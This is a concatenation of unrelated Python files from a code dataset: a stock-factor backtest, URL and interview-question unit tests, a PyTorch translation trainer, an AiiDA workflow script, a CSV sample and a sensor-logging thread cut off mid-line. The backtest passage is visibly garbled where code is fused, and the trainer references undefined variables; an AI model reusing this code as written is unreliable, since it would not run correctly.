\"D:\\\\czy\\\\DecisionTree_stock\\\\\" #存放optr的地址\r\nos.chdir(rootpath)\r\nimport optr\r\nimport datetime\r\nimport importlib\r\nimportlib.reload(optr)\r\npath = 'D:\\czy\\DecisionTree_stock\\\\StockData\\\\'#数据地址\r\noutpath = \"D:\\\\czy\\\\DecisionTree_stock\\\\output\\\\\"\r\n\r\nprint (\"setting data...\")\r\ntime_interval = 20 #default_time_interval在optr.py中调整\r\noptr.change_time_interval(time_interval)\r\ndata_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nyizi = pd.read_csv(path + 'yizi.csv').set_index('DATETIME') \r\nRawRet = pd.read_csv(path + 'RawRet.csv').set_index('DATETIME') \r\nyizi = yizi.applymap(lambda x: round(x, 2))\r\nRawRet = RawRet.applymap(lambda x: round(x, 2))\r\nindex_for_all = RawRet.index\r\ncolumns_for_all = RawRet.columns\r\nyizi = np.array(yizi)\r\nRawRet = np.array(RawRet)\r\nDataslide = {}\r\nfor tag in data_list:\r\n Dataslide[tag] = pd.read_csv(path + tag + '.csv').set_index('DATETIME')\r\n Dataslide[tag] = Dataslide[tag].fillna(method = 'pad')\r\n Dataslide[tag] = Dataslide[tag].applymap(lambda x: round(x, 2))\r\n Dataslide[tag] = np.array(Dataslide[tag])\r\nprint (\"data settled\")\r\n\r\n\r\n#%%回测函数 \r\ndef fitness_func(factor_tmp, yizi,RawRet):\r\n #计算持仓\r\n stock_num = 300\r\n fee_oneside = 0.0007\r\n factor = factor_tmp.argsort(axis = 1).argsort(axis = 1)\r\n factor = factor + np.isnan(factor_tmp)*5000\r\n factor = (factor0)/len(Retdf)\r\n perform.loc[0,'日盈亏比'] = -Retdf.loc[Retdf['Ret']>0,'Ret'].mean()/Retdf.loc[Retdf['Ret']<0,'Ret'].mean()\r\n \r\n perform.loc[0,'最大回撤'] = Retdf['dd'].min()\r\n perform.loc[0,'夏普'] = perform.loc[0,'年化收益率']/perform.loc[0,'年化波动率']\r\n perform.loc[0,'卡玛'] = -perform.loc[0,'年化收益率']/perform.loc[0,'最大回撤']\r\n perform.loc[0,'日均换手率'] = factor.diff().abs().sum(axis = 1).mean()/2/stock_num\r\n '''\r\n return calma, Retdf\r\n\r\n#%%回测单因子多参数\r\nfactorNo = 66\r\nf = getattr(optr, 'factor' + str(factorNo))\r\n\r\n#设置参数,不同因子要修改\r\nA_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nB_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nC_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nD_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\na_list = [10,30]\r\nb_list = [10,30]\r\nc_list = [10,25,40]\r\nd_list = [10,25,40]\r\ne_list = [10,25,40]\r\nparaLists =[]\r\nparaLists.append(A_list)\r\nparaLists.append(B_list)\r\nparaLists.append(C_list)\r\nparaLists.append(D_list)\r\nparaLists.append(a_list)\r\n#paraLists.append(b_list)\r\n#paraLists.append(c_list)\r\n#paraLists.append(d_list)\r\n#paraLists.append(e_list)\r\nparaRows = list(itertools.product(*paraLists))\r\n#paraRows_select = paraRows\r\n\r\n\r\nparaRows_select = []\r\nfor p in paraRows:\r\n if p[2] != p[1]: #删除某些参数组,条件自定\r\n paraRows_select.append(p)\r\n'''\r\n'''\r\n#测试因子\r\ncalma_result = pd.DataFrame()\r\nfor i,p in enumerate(paraRows_select):\r\n\r\n factor_tmp = f(Dataslide[p[0]],Dataslide[p[1]],Dataslide[p[2]],Dataslide[p[3]],p[4]) #不同因子要修改\r\n\r\n [calma, Retdf] = fitness_func(factor_tmp, yizi,RawRet)\r\n calma_result.loc[i, 'calma'] = calma\r\n calma_result.loc[i, 'para'] = str(p)\r\n print (\"\\r进度:\" + str(round(i/len(paraRows_select)*100, 2)) + \"%\", end = ' ') \r\n \r\ncalma_result.to_csv(outpath + \"calma_factor\" + str(factorNo) + \".csv\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"195030544","text":"from urllib.parse import urlsplit, urlunsplit\n\nimport pytest\nfrom hypothesis import given\nfrom hypothesis.provisional import urls\n\nfrom quarchive.value_objects import URL, BadCanonicalisationException\n\n\ndef test_from_string():\n url = URL.from_string(\"http://example.com/a?b=c#d\")\n assert url.scheme == \"http\"\n assert url.netloc == \"example.com\"\n assert url.path == \"/a\"\n assert url.query == \"b=c\"\n assert url.fragment == \"d\"\n\n\ndef test_to_string():\n url_string = \"http://example.com/a?b=c#d\"\n url = URL.from_string(url_string)\n assert url.to_string() == url_string\n\n\n@given(url=urls())\ndef test_url_uuid_stability(url):\n # This is not a piece of code as such but an important property - need to\n # be sure that urlsplit, urlunsplit and create_url_uuid work together and\n # are stable.\n URL.from_string(urlunsplit(urlsplit(url))) == URL.from_string(url)\n\n\n@pytest.mark.parametrize(\"problem_url\", [\"http://example.com?\", \"http://example.com#\",])\ndef test_url_from_non_minimal_canonicalisation_fails(problem_url):\n with pytest.raises(BadCanonicalisationException) as e:\n URL.from_string(problem_url)\n\n assert e.value.url_string == problem_url\n","sub_path":"src/server/tests/test_url.py","file_name":"test_url.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"634588922","text":"#!/usr/bin/env python3\nimport traceback\nimport sys\nimport doctest\nimport unittest\nimport os\nimport numpy\n\nTEST_WORK_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(TEST_WORK_PATH, \"../src/solutions\"))\nfrom interview_questions import *\n\n\nclass TestStack(unittest.TestCase):\n def setUp(self):\n self.stack = Stack()\n\n def tearDown(self):\n del self.stack\n\n def test_normal_case(self):\n normal = [3, 10, 100, 50, 1000, 9]\n for i in normal:\n self.stack.push(i)\n self.assertEqual(self.stack.traverse(), normal)\n self.assertEqual(self.stack.max(), 1000)\n for i in range(2):\n self.stack.pop()\n self.assertEqual(self.stack.traverse(), normal[0:4])\n self.assertEqual(self.stack.max(), 100)\n\n\nclass TestBiggestCluster(unittest.TestCase):\n def _prepare_testing_data(self):\n # input arguments\n in_a = numpy.array([])\n in_b = numpy.array([1])\n in_c = numpy.array([1, 1, 1, 0, 0, 1, 1])\n in_d = numpy.array([[1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1]])\n in_e = numpy.array([[1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1]])\n in_f = numpy.array([[1, 0, 0, 1, 1, 0, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 1, 1]])\n # output results\n ot_a = []\n ot_b = [1]\n ot_c = [3, 2]\n ot_d = [26]\n ot_e = [6, 12, 3]\n ot_f = [11, 2, 3]\n self._inputList = [in_a, in_b, in_c, in_d, in_e, in_f]\n self._outputList = [ot_a, ot_b, ot_c, ot_d, ot_e, ot_f]\n\n def setUp(self):\n self._testFun = find_cluster\n self._prepare_testing_data()\n\n def tearDown(self):\n del self._inputList[:]\n del self._outputList[:]\n\n def test_find_biggest_cluster(self):\n for input, output in zip(self._inputList, self._outputList):\n with self.subTest(intput=input, output=output):\n self.assertEqual(self._testFun(input), output)\n\n\ndef suite():\n suite = unittest.TestSuite()\n test_cases = [\n TestBiggestCluster,\n TestStack\n ]\n for test_case in test_cases:\n suite.addTest(unittest.makeSuite(test_case))\n return suite\n\n\ndef run_unit_test(verbose=1):\n test_suit = suite()\n runner = unittest.TextTestRunner(verbosity=verbose)\n runner.run(test_suit)\n '''unittest.main() # run all unittest'''\n\n\ndef run_test():\n doctest.testmod()\n run_unit_test(2)\n\n\ndef main():\n try:\n run_test()\n\n except Exception as error:\n print(error)\n exc_info = sys.exc_info()\n traceback.print_exception(*exc_info)\n del exc_info\n except SystemExit as inst:\n # raised by sys.exit(True) when tests failed\n # return val of shell 0/1 represents succeed/failed\n if inst.args[0] is True:\n raise\n except:\n print(\"caught unknown exception\")\n exc_info = sys.exc_info()\n traceback.print_exception(*exc_info)\n del exc_info\n else:\n pass\n # print(\"no exception caught :) \")\n finally:\n pass\n # print(\"executing finally clause\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"unit_test/test_interview_questions.py","file_name":"test_interview_questions.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542830023","text":"import os\r\nimport sys\r\nimport argparse\r\nimport logging\r\nfrom tqdm.notebook import tqdm\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport transformers\r\nfrom config.configs import set_random_fixed, get_path_info\r\nfrom data.dataloader import get_dataloader\r\nfrom data.tokenizer import Tokenizer\r\nfrom util.utils import (load_metricfn, load_optimizer, load_scheduler, load_lossfn, \r\n save_checkpoint, load_checkpoint, save_bestmodel, \r\n time_measurement, count_parameters, initialize_weights)\r\nfrom models.model import build_model\r\n\r\nclass Finetune_Trainer():\r\n def __init__(self, parser):\r\n \r\n # set parser\r\n self.args = parser.parse_args()\r\n\r\n # save loss history to plot later on\r\n self.training_history = []\r\n self.validation_history = []\r\n\r\n # set variables needed for training\r\n self.n_epoch = self.args.epoch\r\n self.train_batch_size = self.args.train_batch_size\r\n self.display_step = self.args.display_step # training\r\n self.val_batch_size = self.args.val_batch_size\r\n self.test_batch_size = self.args.test_batch_size\r\n self.display_examples = self.args.display_examples # testing\r\n \r\n self.lr = self.args.init_lr\r\n self.eps = self.args.adam_eps\r\n self.weight_decay = self.args.weight_decay\r\n self.beta1 = self.args.adam_beta1\r\n self.beta2 = self.args.adam_beta2\r\n\r\n self.warmup_steps = self.args.warm_up\r\n self.factor = self.args.factor\r\n self.patience = self.args.patience\r\n self.clip = self.args.clip\r\n\r\n self.enc_language = self.args.enc_language\r\n self.dec_language = self.args.dec_language\r\n self.enc_max_len = self.args.enc_max_len\r\n self.dec_max_len = self.args.dec_max_len\r\n\r\n self.device = self.args.device\r\n\r\n # build dataloader\r\n self.train_dataloader, self.val_dataloader, self.test_dataloader = get_dataloader(\r\n self.train_batch_size, self.val_batch_size, self.test_batch_size,\r\n self.enc_language, self.dec_language, self.enc_max_len, self.dec_max_len,\r\n self.args.dataset_name, self.args.dataset_type, self.args.category_name,\r\n self.args.x_name, self.args.y_name, self.args.percentage\r\n )\r\n self.train_batch_num = len(self.train_dataloader)\r\n self.val_batch_num = len(self.val_dataloader)\r\n self.test_batch_num = len(self.test_dataloader)\r\n \r\n self.t_total = self.train_batch_num * self.n_epoch\r\n\r\n # build tokenizer (for decoding purpose)\r\n self.decoder_tokenizer = Tokenizer(self.args.dec_language,self.args.dec_max_len)\r\n\r\n # load metric\r\n self.metric = load_metricfn(self.args.metric)\r\n \r\n # build model\r\n self.model = build_model(self.args.enc_pad_idx, self.args.dec_pad_idx,\r\n self.args.enc_vocab_size, self.args.dec_vocab_size, \r\n self.args.model_dim, self.args.key_dim, self.args.value_dim, self.args.hidden_dim, \r\n self.args.num_heads, self.args.num_layers, self.args.enc_max_len, self.args.dec_max_len, self.args.drop_prob)\r\n \r\n self.model.apply(initialize_weights)\r\n\r\n # build optimizer\r\n self.optimizer = load_optimizer(self.model, self.lr, self.weight_decay, \r\n self.beta1, self.beta2, self.eps)\r\n \r\n # build scheduler\r\n self.scheduler = load_scheduler(self.optimizer, self.factor, self.patience)\r\n \r\n # build lossfn\r\n self.lossfn = load_lossfn(self.args.lossfn,self.args.dec_pad_idx)\r\n\r\n def train_test(self):\r\n best_model_epoch, training_history, validation_history = self.finetune()\r\n best_model = self.test(best_model_epoch)\r\n self.plot(training_history, validation_history)\r\n\r\n def finetune(self):\r\n # set logging \r\n logging.basicConfig(level=logging.WARNING)\r\n \r\n # logging message\r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write('You have started training the model.\\n')\r\n print('Your model size is : ')\r\n count_parameters(self.model)\r\n sys.stdout.write('#################################################\\n')\r\n\r\n # set randomness of training procedure fixed\r\n self.set_random(516)\r\n \r\n # build directory to save to model's weights\r\n self.build_directory()\r\n\r\n # set initial variables for training, validation\r\n train_batch_num = len(self.train_dataloader)\r\n validation_batch_num = len(self.val_dataloader)\r\n\r\n # set initial variables for model selection\r\n best_model_epoch=0\r\n best_model_score=0\r\n best_model_loss =float('inf')\r\n\r\n # save information of the procedure of training\r\n training_history=[]\r\n validation_history=[]\r\n\r\n # predict when training will end based on average time\r\n total_time_spent_secs = 0\r\n \r\n # start of looping through training data\r\n for epoch_idx in range(self.n_epoch):\r\n # measure time when epoch start\r\n start_time = time.time()\r\n \r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write(f\"Epoch : {epoch_idx+1} / {self.n_epoch}\")\r\n sys.stdout.write('\\n')\r\n sys.stdout.write('#################################################\\n')\r\n\r\n ########################\r\n #### Training Phase ####\r\n ########################\r\n \r\n # switch model to train mode\r\n self.model.train()\r\n\r\n # set initial variables for training (inside epoch)\r\n training_loss_per_epoch=0.0\r\n training_score_per_epoch=0.0\r\n\r\n # train model using batch gradient descent with Adam Optimizer\r\n for batch_idx, batch in tqdm(enumerate(self.train_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n model_output = self.model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n\r\n # reshape model output and labels\r\n reshaped_model_output = model_output.contiguous().view(-1,model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1)]\r\n \r\n # compute loss using model output and labels(reshaped ver)\r\n loss = self.lossfn(reshaped_model_output, reshaped_decoder_labels)\r\n\r\n # clear gradients, and compute gradient with current batch\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n\r\n # clip gradients\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(),self.clip)\r\n\r\n # update gradients\r\n self.optimizer.step()\r\n\r\n # add loss to training_loss\r\n training_loss_per_iteration = loss.item()\r\n training_loss_per_epoch += training_loss_per_iteration\r\n\r\n # compute bleu score using model output and labels(reshaped ver)\r\n training_score_per_iteration,_1,_2 = self.compute_bleu(model_output,decoder_labels)\r\n training_score_per_epoch += training_score_per_iteration[\"bleu\"]\r\n\r\n # Display summaries of training procedure with period of display_step\r\n if ((batch_idx+1) % self.display_step==0) and (batch_idx>0):\r\n sys.stdout.write(f\"Training Phase | Epoch: {epoch_idx+1} | Step: {batch_idx+1} / {train_batch_num} | loss : {training_loss_per_iteration} | score : {training_score_per_iteration['bleu']}\")\r\n sys.stdout.write('\\n')\r\n\r\n # update scheduler\r\n self.scheduler.step()\r\n\r\n # save training loss of each epoch, in other words, the average of every batch in the current epoch\r\n training_mean_loss_per_epoch = training_loss_per_epoch / train_batch_num\r\n training_history.append(training_mean_loss_per_epoch)\r\n\r\n ##########################\r\n #### Validation Phase ####\r\n ##########################\r\n\r\n # switch model to eval mode\r\n self.model.eval()\r\n\r\n # set initial variables for validation (inside epoch)\r\n validation_loss_per_epoch=0.0 \r\n validation_score_per_epoch=0.0\r\n\r\n # validate model using batch gradient descent with Adam Optimizer\r\n for batch_idx, batch in tqdm(enumerate(self.val_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n model_output = self.model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n \r\n # reshape model output and labels\r\n reshaped_model_output = model_output.contiguous().view(-1,model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1),vocab_dec]\r\n \r\n # compute loss using model output and labels(reshaped ver)\r\n loss = self.lossfn(reshaped_model_output, reshaped_decoder_labels)\r\n\r\n # add loss to training_loss\r\n validation_loss_per_iteration = loss.item()\r\n validation_loss_per_epoch += validation_loss_per_iteration\r\n\r\n # compute bleu score using model output and labels(reshaped ver)\r\n validation_score_per_iteration,_1,_2 = self.compute_bleu(reshaped_model_output,reshaped_decoder_labels)\r\n validation_score_per_epoch += validation_score_per_iteration[\"bleu\"]\r\n\r\n # save validation loss of each epoch, in other words, the average of every batch in the current epoch\r\n validation_mean_loss_per_epoch = validation_loss_per_epoch / validation_batch_num\r\n validation_history.append(validation_mean_loss_per_epoch)\r\n\r\n # save validation score of each epoch, in other words, the average of every batch in the current epoch\r\n validation_mean_score_per_epoch = validation_score_per_epoch / validation_batch_num\r\n\r\n # Display summaries of validation result after all validation is done\r\n sys.stdout.write(f\"Validation Phase | Epoch: {epoch_idx+1} | loss : {validation_mean_loss_per_epoch} | score : {validation_mean_score_per_epoch}\")\r\n sys.stdout.write('\\n')\r\n\r\n # Model Selection Process using validation_mean_score_per_epoch\r\n if (validation_mean_loss_per_epoch < best_model_loss):\r\n best_model_epoch = epoch_idx\r\n best_model_loss = validation_mean_loss_per_epoch\r\n best_model_score = validation_mean_score_per_epoch\r\n\r\n save_checkpoint(self.model, self.optimizer, epoch_idx,\r\n os.path.join(self.args.weight_path,str(epoch_idx+1)+\".pth\"))\r\n\r\n # measure time when epoch end\r\n end_time = time.time()\r\n\r\n # measure the amount of time spent in this epoch\r\n epoch_mins, epoch_secs = time_measurement(start_time, end_time)\r\n sys.stdout.write(f\"Time spent in {epoch_idx+1} is {epoch_mins} minuites and {epoch_secs} seconds\\n\")\r\n \r\n # measure the total amount of time spent until now\r\n total_time_spent += (end_time - start_time)\r\n total_time_spent_mins = int(total_time_spent/60)\r\n total_time_spent_secs = int(total_time_spent - (total_time_spent_mins*60))\r\n sys.stdout.write(f\"Total amount of time spent until {epoch_idx+1} is {total_time_spent_mins} minuites and {total_time_spent_secs} seconds\\n\")\r\n\r\n # calculate how more time is estimated to be used for training\r\n avg_time_spent_secs = total_time_spent_secs / (epoch_idx+1)\r\n left_epochs = self.n_epoch - (epoch_idx+1)\r\n estimated_left_time = avg_time_spent_secs * left_epochs\r\n estimated_left_time_mins = int(estimated_left_time/60)\r\n estimated_left_time_secs = int(estimated_left_time - (estimated_left_time_mins*60))\r\n sys.stdout.write(f\"Estimated amount of time until {self.n_epoch} is {estimated_left_time_mins} minuites and {estimated_left_time_secs} seconds\\n\")\r\n\r\n # summary of whole procedure \r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write(f\"Training and Validation has ended.\\n\")\r\n sys.stdout.write(f\"Your best model was the model from epoch {best_model_epoch} and scored {self.args.metric} score : {best_model_score} and loss : {best_model_loss}\\n\")\r\n sys.stdout.write('#################################################\\n')\r\n\r\n return best_model_epoch, training_history, validation_history\r\n \r\n def test(self, best_model_epoch):\r\n\r\n # logging message\r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write('You have started testing the model.\\n')\r\n sys.stdout.write('#################################################\\n')\r\n\r\n # set randomness of training procedure fixed\r\n self.set_random(516)\r\n\r\n # set weightpath\r\n weightpath = os.path.join(os.getcwd(),'weights')\r\n\r\n # loading the best_model from checkpoint\r\n best_model = build_model(self.args.pad_idx, self.args.pad_idx, self.args.bos_idx, \r\n self.args.vocab_size, self.args.vocab_size, \r\n self.args.model_dim, self.args.key_dim, self.args.value_dim, self.args.hidden_dim, \r\n self.args.num_head, self.args.num_layers, self.args.max_len, self.args.drop_prob)\r\n \r\n load_checkpoint(best_model, self.optimizer, \r\n os.path.join(self.args.weight_path,str(best_model_epoch+1)+\".pth\"))\r\n\r\n # set initial variables for test\r\n test_batch_num = len(self.test_dataloader)\r\n\r\n ##########################\r\n ###### Test Phase ######\r\n ##########################\r\n\r\n # switch model to eval mode\r\n best_model.eval()\r\n\r\n # set initial variables for testing\r\n test_score=0.0 \r\n \r\n # test model using batch gradient descent with Adam Optimizer\r\n with torch.no_grad():\r\n for batch_idx, batch in tqdm(enumerate(self.test_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n best_model_output = best_model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n \r\n # reshape model output and labels\r\n reshaped_best_model_output = best_model_output.contiguous().view(-1,best_model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1),vocab_dec]\r\n \r\n # compute bleu score using model output and labels(reshaped ver)\r\n test_score_per_iteration,_1,_2 = self.compute_bleu(reshaped_best_model_output,reshaped_decoder_labels)\r\n test_score += test_score_per_iteration[\"bleu\"]\r\n \r\n # Display examples of translation with period of display_examples\r\n if (batch_idx+1) % self.display_examples==0 and batch_idx>0:\r\n # decode model_output and labels using Tokenizer\r\n decoded_origins = self.decoder_tokenizer.decode(encoder_input_ids)\r\n decoded_preds = self.decoder_tokenizer.decode(best_model_output)\r\n decoded_labels = self.decoder_tokenizer.decode(decoder_labels)\r\n\r\n # post process text for evaluation\r\n decoded_origins = [origin.strip() for origin in decoded_origins]\r\n decoded_preds = [pred.strip() for pred in decoded_preds]\r\n decoded_labels = [label.strip() for label in decoded_labels]\r\n\r\n # print out model_input(origin), model_output(pred) and labels(ground truth)\r\n sys.stdout.write(f\"Testing Phase | Step: {batch_idx+1} / {test_batch_num}\\n\")\r\n sys.stdout.write(\"Original Sentence : \")\r\n sys.stdout.write(decoded_origins)\r\n sys.stdout.write('\\n')\r\n sys.stdout.write(\"Ground Truth Translated Sentence : \")\r\n sys.stdout.write(decoded_labels)\r\n sys.stdout.write('\\n')\r\n sys.stdout.write(\"Model Prediction - Translated Sentence : \")\r\n sys.stdout.write(decoded_preds)\r\n sys.stdout.write('\\n')\r\n\r\n # calculate test score\r\n test_score = test_score / test_batch_num\r\n\r\n # Evaluate summaries with period of display_steps\r\n sys.stdout.write(f\"Test Phase | Best Epoch: {best_model_epoch+1} | score : {test_score}\\n\")\r\n\r\n # save best model\r\n save_bestmodel(best_model,self.optimizer,self.args,\r\n os.path.join(self.args.final_model_path,\"bestmodel.pth\"))\r\n\r\n return best_model\r\n\r\n def plot(self, training_history, validation_history):\r\n step = np.linspace(0,self.n_epoch,self.n_epoch)\r\n plt.plot(step,np.array(training_history),label='Training')\r\n plt.plot(step,np.array(validation_history),label='Validation')\r\n plt.xlabel('number of epochs')\r\n plt.ylabel('Loss')\r\n plt.legend()\r\n plt.show()\r\n\r\n cur_path = os.getcwd()\r\n save_dir = os.path.join(curpath,'plot')\r\n path = os.path.join(save_dir, 'train_validation_plot.png')\r\n sys.stdout.write('Image of train, validation history saved as plot png!\\n')\r\n \r\n plt.savefig(path)\r\n\r\n def build_directory(self):\r\n # Making directory to store model pth\r\n curpath = os.getcwd()\r\n weightpath = os.path.join(curpath,'weights')\r\n os.mkdir(weightpath)\r\n\r\n def set_random(self, seed_num):\r\n set_random_fixed(seed_num)\r\n\r\n","sub_path":"src/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":20434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"245720395","text":"from aiida.common.example_helpers import test_and_get_code # noqa\nfrom aiida.orm.data.structure import StructureData # noqa\nfrom aiida.orm.data.parameter import ParameterData # noqa\nfrom aiida.orm.data.base import Str\nfrom aiida.work.run import submit\n\nfrom ase.io import read\nfrom charges import DdecChargesWorkChain\n\natoms = read('Fe-MOF-74_h111.xyz')\natoms.cell = [[6.96775, 0.00000, 0.00000],\n [-2.33067, 15.22261, 0.00000],\n [ -2.32566, -7.57517, 13.22945]]\n\nstructure = StructureData(ase=atoms)\nstructure.store()\n\ncp2k_options_dict = {\n \"resources\": {\n \"num_machines\": 2,\n },\n \"max_wallclock_seconds\": 8 * 60 * 60,\n }\n\nddec_options_dict = {\n \"resources\": {\n \"num_machines\": 1,\n },\n \"max_wallclock_seconds\": 8 * 60 * 60,\n \"withmpi\": False,\n }\ncp2k_options = ParameterData(dict=cp2k_options_dict)\nddec_options = ParameterData(dict=ddec_options_dict)\ncp2k_code = test_and_get_code('cp2k@fidis', expected_code_type='cp2k')\nddec_code = test_and_get_code('ddec@fidis', expected_code_type='ddec')\nsubmit(DdecChargesWorkChain,\n structure=structure,\n cp2k_code=cp2k_code,\n cp2k_options=cp2k_options,\n ddec_code=ddec_code,\n ddec_options=ddec_options,\n ) \n","sub_path":"workflows/charges/run_charges_workflow.py","file_name":"run_charges_workflow.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"179518746","text":"# csv 전담 라이브러리 -> 표준 라이브러리\nimport csv\n\nwith open(\"../day7/점수.txt\", mode=\"r\", encoding=\"utf-8\") as f:\n f_csv = csv.reader(f) # csv.reader(파일)로 파일을 csv 형태로 읽어서 리스트의 묶음인 csv reader 오브젝트로 반환\n header = next(f_csv) # next(csv reader 오브젝트)로 첫 줄을 없앨 수 있음\n kor_list = []\n eng_list = []\n math_list = []\n for row in f_csv:\n kor, eng, math = row\n kor_list.append(int(kor))\n eng_list.append(int(eng))\n math_list.append(int(math))\n print(sum(kor_list))\n print(sum(eng_list))\n print(sum(math_list))","sub_path":"day8/sample23_file10_csv.py","file_name":"sample23_file10_csv.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"346372987","text":"from threading import Thread\r\nimport pyupm_i2clcd\r\nimport logging\r\nimport json\r\nimport extractor\r\nimport time\r\nfrom sql import SQL\r\nimport Queue\r\nfrom datetime import datetime\r\n\r\n\r\nclass PROCESSOR(Thread):\r\n \"\"\"thread that gets data from the queue, saves it to \r\n a file if gps has fix and displays it on the i2c screen\r\n \"\"\"\r\n def __init__(self, queue, exit_queue, message_queue, name, data_directory):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n self.name = name\r\n self.exitQueue = exit_queue\r\n self.message_queue = message_queue\r\n self.db = SQL(data_directory,'pmdatalog.db')\r\n self.data_dictionary = extractor.Extractor()\r\n self.filename = data_directory + '%s_%s.txt'\r\n\r\n def run(self):\r\n logging.debug(\"PROCESSOR thread started!\")\r\n self.message_queue.put('Data processor started, waiting for GPS.')\r\n\r\n create_file_flag = True\r\n last_time_for_update = '00:00:00'\r\n\r\n while True:\r\n if not self.exitQueue.empty():\r\n break\r\n\r\n try:\r\n dictionary_item = self.queue.get(False)\r\n self.queue.task_done()\r\n if 'bmp' in dictionary_item:\r\n self.data_dictionary.extract_bmp280(dictionary_item['bmp'])\r\n elif 'gps' in dictionary_item:\r\n self.data_dictionary.extract_gps(dictionary_item['gps'])\r\n elif 'pm' in dictionary_item:\r\n self.data_dictionary.extract_particle(dictionary_item['pm'])\r\n else:\r\n pass\r\n except Queue.Empty:\r\n # nothing to do and avoiding blocking behavior\r\n time.sleep(0.1)\r\n pass\r\n\r\n # waiting for the needed keys to appear in the dictionary\r\n if self.data_dictionary.all_components_updated and self.data_dictionary.data['gps_qual'] in [1, 2] \\\r\n and last_time_for_update != self.data_dictionary.data[\"time\"]:\r\n # 0 means NO FIX, 1 means GPS fix, 2 indicates DGPS\r\n if create_file_flag:\r\n self.filename = self.filename % (self.data_dictionary.data[\"date\"], self.data_dictionary.data[\"time\"].replace(':', '-'))\r\n self.db.new_session()\r\n create_file_flag = False\r\n # save row in database once a second\r\n last_time_for_update = self.data_dictionary.data[\"time\"]\r\n self.db.save_row(self.data_dictionary.data)\r\n\r\n with open(self.filename, 'a') as f:\r\n data = json.dumps(self.data_dictionary.data, sort_keys=True)\r\n logging.debug('writing %d bytes to SD card' % len(data))\r\n # what are the odds 